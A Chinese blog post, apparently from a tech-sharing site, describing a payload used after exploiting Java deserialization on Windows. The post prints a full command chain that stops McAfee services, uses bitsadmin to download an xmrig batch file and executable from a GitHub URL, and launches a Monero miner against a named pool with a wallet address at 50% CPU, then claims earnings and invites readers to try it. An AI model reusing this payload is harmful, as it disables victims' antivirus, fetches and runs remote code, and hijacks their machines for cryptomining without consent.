最近,安全社区中有很多人都在讨论如何利用Java反序列化漏洞来攻击类似Apache、SOLR和WebLogic之类的系统。不说废话,我们直接进入正题。目前绝大多数的此类攻击针对的都是Linux/Unix系统,但是我近期发现了一种针对Windows系统的攻击方法。

PS:本文仅用于技术讨论与分享,严禁用于非法用途

攻击代码如下:

cmd/cnet stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;

实际的Payload分析

关闭McAfee反病毒软件(我不明白社区中的这种技术为啥只关掉McAfee…):

netstop "McAfee McShield;netstop mcafeeframework;

使用bitsadmin从GitHub下载加密货币挖矿程序和一个batch脚本文件:

bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dirxmrig*;xmrig.bat;tasklist;

Batch脚本文件代码如下:

taskkill/im /f xmrig.exe /tnetstop "McAfee McShield"netstop mcafeeframeworkxmrig.exe-o http://monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1

首先,上述代码会终止其他xmrig进程(可能是为了防止资源竞争)。接下来,它会关闭McAfee。然后便会开启挖矿程序,并跟http://monerohash.com矿池(端口3333)进行连接。它只会占用大约50%的CPU资源,估计是为了避免被检测到吧。

目前为止,这个挖矿程序的计算能力只能实现350哈希每秒,并为我挖到了40个门罗币(价值约为7000美元)。

感兴趣的同学可以自己动手试一试,说不定会有一些意想不到的收获。

利用Java反序列化漏洞在Windows上的挖矿实验相关推荐

  1. java反序列化漏洞POP查找_利用 Java 反序列化漏洞在受限环境下获取反向 Shell

    原标题:利用 Java 反序列化漏洞在受限环境下获取反向 Shell 原文链接: https://medium.com/abn-amro-red-team/java-deserialization-f ...

  2. Java反序列化漏洞通用利用分析

    2015年11月6日,FoxGlove Security安全团队的@breenmachine 发布的一篇博客[3]中介绍了如何利用Java反序列化漏洞,来攻击最新版的WebLogic.WebSpher ...

  3. Lib之过?Java反序列化漏洞通用利用分析

    1 背景 2015年11月6日,FoxGlove Security安全团队的@breenmachine 发布的一篇博客[3]中介绍了如何利用Java反序列化漏洞,来***最新版的WebLogic.We ...

  4. java反序列化漏洞 poc_Java反序列化漏洞详解

    Java反序列化漏洞从爆出到现在快2个月了,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具.本文对于Java反序列化的漏洞简述后,并对于Java反序列化的Poc进行详 ...

  5. java反序列化漏洞挖掘

    java反序列化漏洞挖掘 1.漏洞触发场景 在java编写的web应用与web服务器间java通常会发送大量的序列化对象例如以下场景: 1)HTTP请求中的参数,cookies以及Parameters ...

  6. java反序列化漏洞分析

    Java反序列化漏洞(Java Deserialization Vulnerabilities)是一种常见的安全漏洞,其攻击方式是利用Java中的序列化和反序列化机制,通过在序列化数据中插入恶意代码, ...

  7. java 反序列化漏洞 利用思路简介

    目录 序列化的过程 readObject方法 反射链 完成反序列漏洞实践 结论 之前听别人讲解反序列化的漏洞听的晕乎乎的,刚脆就趁着周末研究一下反序列化漏洞,并且搭建实战环境实际操作了一把,明白了之后 ...

  8. 深入理解JNDI注入与Java反序列化漏洞利用

    rmi 和 jndi 这些概念,一直接触,但是看了会儿 还是略微懵逼,这篇文章 暂时理清了我的思路 [承上启下]----------------------------------上边属于我自己瞎扯的 ...

  9. 6-java安全——java反序列化漏洞利用链

    本篇将结合一个apache commons-collections组件来学习java反序列化漏洞原理,以及如何构造利用链. 我们知道序列化操作主要是由ObjectOutputStream类的 writ ...

最新文章

  1. 智能合约语言Solidity Solidity API
  2. R语言与数据分析(10)-内置数据集
  3. Windows Store App JavaScript 开发:获取文件和文件夹列表
  4. Android中软键盘(输入法)收起的方法
  5. 工作76::一直报400
  6. (原创)c#学习笔记06--函数02--变量的作用域01--其他结构中变量的作用域
  7. 软件行业大牛告诉你何谓成功?
  8. SQL SERVER 2012/2014 链接到 SQL SERVER 2000的各种坑
  9. 【小型JavaFx项目】文字小冒险游戏
  10. php 给注册加上限制条件,在注册用户时用两个条件限制,该如何处理
  11. java 枚举获取key_「Java必修课」HashMap性能很好?问过我EnumMap没
  12. 分析师:网易游戏占营收91% 已成游戏公司
  13. 单片机C51 之(1)简介
  14. Mac连接Windows共享的老式打印机
  15. UK EU 码对照表,USA EURO SIZE码对照表 国外衣服码对照表
  16. 名片小程序制作公司要如何选择?
  17. 关于工作后定居城市的思考以及房价预测【zz】
  18. 【C++】C++格式化输出/输出格式控制/输出精度控制
  19. 对 IIC 总线的理解、调用函数以及常见面试问题
  20. linux服务器如何识别移动硬盘,Linux服务器如何识别移动硬盘?

热门文章

  1. LeetCode每日一题488. 祖玛游戏
  2. oracle查看dlink,oracle创建dlink方法
  3. POJ4084: 拓扑排序
  4. 5.22 阿博茨科技 面试总结
  5. Tensor是神马?为什么还会Flow?
  6. 国企工资1万辞职去1.5万月薪私企,不想“内卷”,过来人:请三思
  7. 让建设银行晕倒的女人
  8. 全球名校AI课程库(44)| 慕尼黑工大 · 计算机视觉深度学习进阶课『Advanced Deep Learning for Computer Vision』
  9. 《从零开始的记账本开发》第1篇 需求分析
  10. Stanford Named Entity Recognizer (NER) 斯坦福命名实体识别(NER)